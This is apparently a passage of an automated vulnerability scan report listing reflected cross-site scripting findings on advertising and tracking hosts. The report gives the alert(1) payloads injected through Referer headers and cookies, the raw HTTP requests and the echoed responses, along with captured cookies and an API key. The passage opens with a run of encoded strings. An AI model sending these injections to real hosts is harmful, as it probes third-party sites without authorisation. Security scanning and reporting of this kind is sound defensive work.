K/Cg3ZPrZqdvIHp6VzZLOixqOtCKtElY4kh2DEYWEUWzepHNrbkpmEP1ktDcuojdoRfUcr5GE+1F3Q1CBzoV9zdnJC4ggvXN2BBcl1JSbG0P0d6PjNEtyg8il6zrUrZZuCG7fvfb0P4lQLism3igStz5Uq7Fb7O9syCEMy+HjeVUK5zG5tnMi+u5709LXeI/l7kLTEDO4kRaDQ+bD93P+QxIuFerYQ6QQ7QGa+KSvFFqt8uAPd6wMRH2je8EahQprDQTw=="; rsiPus_SZ7X="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJybh8eM9OR5om4StALLEl9sEMIKnCoBr4ThgQyPsjf9nPZuNEb4EUj7wGDPWNrTVw1j+2QxLF8RWiqhraX7I4lUnumsV/sixRxjRF5rWB9KnHODU3B/yiV30fU5WC6bOj1fDBV0DAs57Y1VM/Rqbb8VtJJSmdPuodbAFaDfdpDm6REm++yUZWODiA1PgSsK1mOBwVrBpyopchY+4OgBAcnNdBu7w/L+p4vkz7xq5Goy6VfiZ0TNBjdPo/v4CQdQttHJakZm+gPoRcnr8XH/OT/ssNoszQO2+/85IsNVqe/S5WX7jFDwYhMvDn5Dt5mB4fbOeHmBd8VRWNeibvCxdfhK2hc22Jnbs9ab301GfTUNS0KHNnyiz21S4XvPj2TGf+ubFq1Kbspi+Iy/u71WjfDeK6UVxhXUFRtNWRI+eAnzZ3LEmi3WB2PXsOqbHWAKKHyRe9v89iY73LDgm+3fBpoycGDWPFK/RsHJeHPSrtr4UAuN95pWG2/nrmDbSKCrywWqPGdlQR9/zVsvELKVta8Kb2hXgRB5SeKT4I8Qvw7LX27/fRNi/bSmgvXKzRe1hUqlRjX6XHPs0QHeDkvFoNHBHR6Ajw/tGbgLmqpOJgUt9o7kPaVvBif5zEnTpsaxS8IFKfcU+dxfWI8/CmxnYNsY7g8GpNG7aJYb9HmVwGkWUX8LwsrPfKf1pgUYxUwW6GC3lsElPdse8nLrO8xk63FbSLMq3mnzxnapoMGv13ssmyiWG7yfcatekVhCSNFYxh0/O4PhyFtH6aFfMTxZfhpvML3RCDz29z37uiFi/eAbIUlpaUtoxGe65dW0XNADXYxLM76mZA6B1NGvgLlNfdq1MdqZhZ2y9FPoHxQfhpPEdXHQHUTX8tS3khPjHiNVKZn/5bhj+gqcGf/oQMfZcoN3Dp6DcfYtghhM0eIgvjfMN0Jve6yZc402lIKLKSKBwrQdy/Ei6zTKKN66pb/n3jAd9a27M0/ZlWlqomT2Hj4S2MhD+z5axkLPP4YCgoRArhJsGijHKrvfElV/1yUCwkwEUibEPkClwAXnsJOoHSPdyZj4n6XfDf0Mr4tvd5wxRldis09GU2b6TQfka5eghlB5Gl9fE0b1lhP2hTperFRqJFCirRGPhW17dFNR5Wk1TQ3YCC9MODW3N3Gn5eOWUW/Csp76CWctZQVuOtFIlMP88TBXkoNgIVYUXxIEcco7/XHOd81bVaWrJMUoW/d6QS+puM+pHyjLbFvsZfXSNj3f20WXBKOIzVpmZism01RaqPJ/SLNkwdY7hUZuYE1k8/V9PjVOfORXn9i6+dDy+w5TA="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/zotBv0OXJiczDnb++8r/x9cboBDwW00GG7hva5IIx81wm4vtfjNktUmVF/5C6yfUn7k+WYUV3ECFN3pSpL8cGgBFDqkHe/o52XtD75xYzoIMRn7E0P7DlipjQz4QNhurmwSlvYpuxNHnaznP/JBCcOyBj4d5DyfgTVB+yyeNMcwEesXWx4Nk8Qln6Z5TvAdsntlk6mho2KcC+ZrzsPFC9Bgxy6qgpCpo5c38/g8Zwj/y35sO9Cnea0pyTEM8/IwG4gPavU+Gn5R7/nu6Mmd7C1OD5YM8jNXNLr9p/3t0ZAddAb7VXBJDm2efT8pu65sl6BoMyCy39MxKe7ZTIj8/0a7oy/QI+Lqq7Dfz4oLs1K7vfflWpyRUq3yHAMvwtSpIV6p730Q+EQVw+ZCzoIXWql+HLUfMh2mNs8YZD/HWET1lYrnDtpSXNlU/w01miBfnq6HIVzALy6lQcnIzrou7iQaYlbN3PINi/YtkLkB+1X09DMXq8Kxya/goLxHfth5ZtoFL2kQEUZaCxqBX6ENJCg0EC6bS+LJ04CK5P9gPctRmM5RIj5Ia9qr29k7uT5Y/x00fSErdDs4qDHTwsbtrFOb9aieSI10oWf7rdt434Cu50GQczE6QI6w2rnb4a3PVo/Q43Y0dEPEFCUIwxuGIpeD+g351hGAFhi0NBE+GqKdjw/aKnLKFftBAw3ZtfGMQLskKAbJ1uA4hWdUkcbUur+n8vJ8KeaY9g+FEiPuysk3UB1EnShP2fO4dI8v8MySVDt/PgQB0SuruCEWgF1oALgpaM9ds+JdiTLxevJ2pKIpAN0TAu4vB7C9+oi8WGl3BFDWADMhB9tEqNLHj+QReqAbblTXO+0Fao4ngfgqrN2TQFWWaOptLA/dMSU2rJJJBd50TeuVH5PIRurXCB/HR+udAw7vZ111gu3we846cnq8NDUohC2mGKIo+MYUANfl7mp1EH9XRY4d7jSWKgqwSFifHcMdiCtT2fJWPdPvf9ott0sj0KAjqvglA2rXRWHEQsY8gh+30uSBg55yo6tLMlQkKts2L9S5Ye1k72Ehgu9xeLwYzfZsZ8xEExAOxLFrE0Snn+O4T1y3iueXECEKftTScXRzpCsyOdAzYhhg4ZTQtujB0mEPD+ELgknFRnQze8DWyOze471+OhcuVoIJUEpjLZbHrxnBqXYBCF5AzK46mfVZ7IY/OVAGlDDGhX1hJ5l6PJudk2D5zc3lCOpAJipzS7S2QnTOBhw6RhMM25pIpmfDDfh/CHU6sZh9LQFR+dgdYZdrbxH3P7wttjQDITcOSaGwHPt86LSHS4PFtBcqpwrGw8Y9ASmBFC5Y/1lvIGCdNhjDmYdy611TnhkKU3WLdh550O2NfVbB7SmXytkIw7EOJMPb7glUobNTFDf57WbY+hkCHaICapIfleMOMzsyXzWmm/r0lEiaiGWlZ6NAKyMzTRzJtSAJJuu8pInHFdzaPdXuCzod3/5ZAYdEo4kyreOwbSeIRuR80/PxHnv+pcUMMmBl9/sQTF7sptNbiMAmrqTX4wXKyLlfn0AZWo5xJ72ILnpIBNat7RXJ7aGJgrJbXgP9b2H3E4/4BNITDrOzrZrr4zm4r+wXAyllqsEeVFu7Az5ZARlmUo0nhL7DbexToJ7NTL6de4VIUXKoB7/OUEJN0CZT2LSez2G3Hgzz0ZZYVLvR2tXfSEmJkeYzwQhsGjPoV5Sjy8APp0TX20ySt6P0ygHXl0keELI3HTra5m7YTEXvH/nW3+wD8Q"

Response

3.191. http://api.bizographics.com/v1/profile.json [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload eca56<script>alert(1)</script>d29169faca9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: eca56<script>alert(1)</script>d29169faca9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe08y7VMjWLN6FExkNK7HUtFp4B4dlWpgdgD0CnxkWGt3T8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 16 Jun 2011 11:24:38 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: eca56<script>alert(1)</script>d29169faca9

3.192. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102761/PortalServe/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f680"-alert(1)-"0b2d1ddb301 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=6f680"-alert(1)-"0b2d1ddb301
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1; JSESSIONID=C63ED20ECB256E0453300D10DB035B27

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2EB66C57A34CF0171832A3EE817E4974; Path=/
Content-Type: text/javascript
Content-Length: 8034
Date: Thu, 16 Jun 2011 14:14:05 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.google.com/search?hl=en&q=6f680"-alert(1)-"0b2d1ddb301",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ff
...[SNIP]...

3.193. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102769/PortalServe/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bd7d"-alert(1)-"e21357ff8cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=9bd7d"-alert(1)-"e21357ff8cd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DB5418CCEE2892BDFB8D3293E61E806A; Path=/
Content-Type: text/javascript
Content-Length: 8034
Date: Thu, 16 Jun 2011 13:13:16 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.google.com/search?hl=en&q=9bd7d"-alert(1)-"e21357ff8cd",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a04
...[SNIP]...

3.194. http://pixel.adsafeprotected.com/jspix [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76670"-alert(1)-"c763389ff56 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /jspix?anId=124&pubId=test2&advId=netflix&campId=banner HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=76670"-alert(1)-"c763389ff56
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=953DDB8B731D26C8A3610170F852D33C; Path=/
Content-Type: text/javascript
Content-Length: 7831
Date: Thu, 16 Jun 2011 13:08:09 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=76670"-alert(1)-"c763389ff56",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=124&pubId=test2&advId=netflix&campId=banner",
   debug : "false"
};

(function(){var f="3.6";var o=(a
...[SNIP]...

3.195. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload f9a0c<script>alert(1)</script>9162cda6a90 was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376f9a0c<script>alert(1)</script>9162cda6a90; 480-VT=adver_05-21-2011-12-34-28_14859001441305981268; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:06:08 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-16-2011-11-53-17; expires=Sun, 19-Jun-2011 12:06:08 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_06-16-2011-12-06-08_4489038551308225968; expires=Tue, 14-Jun-2016 12:06:08 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_4489038551308225968; expires=Thu, 16-Jun-2011 12:21:08 GMT; path=/; domain=c3metrics.com
Content-Length: 6691
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376f9a0c<script>alert(1)</script>9162cda6a90';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='4489038551308225968';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcal
...[SNIP]...

3.196. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload b3810<script>alert(1)</script>d5a1ee63e06 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=242390405&AR_C=206438244 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p97174789=exp=5&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:04:41 2011&prad=242390405&arc=186884938&; BMX_G=method->-1,ts->1308225881; BMX_3PC=1b3810<script>alert(1)</script>d5a1ee63e06; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 13:08:29 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=7&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:29 2011&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:29 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26215

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"242390405",Pid:"p97174789",Arc:"206438244",Location:
...[SNIP]...
"ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1b3810<script>alert(1)</script>d5a1ee63e06', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:
...[SNIP]...

3.197. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 65620<script>alert(1)</script>61b5de1651b was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=242390405&AR_C=206438244 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p97174789=exp=5&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:04:41 2011&prad=242390405&arc=186884938&; BMX_G=method->-1,ts->130822588165620<script>alert(1)</script>61b5de1651b; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 13:08:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=7&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:28 2011&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26215

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"242390405",Pid:"p97174789",Arc:"206438244",Location:
...[SNIP]...
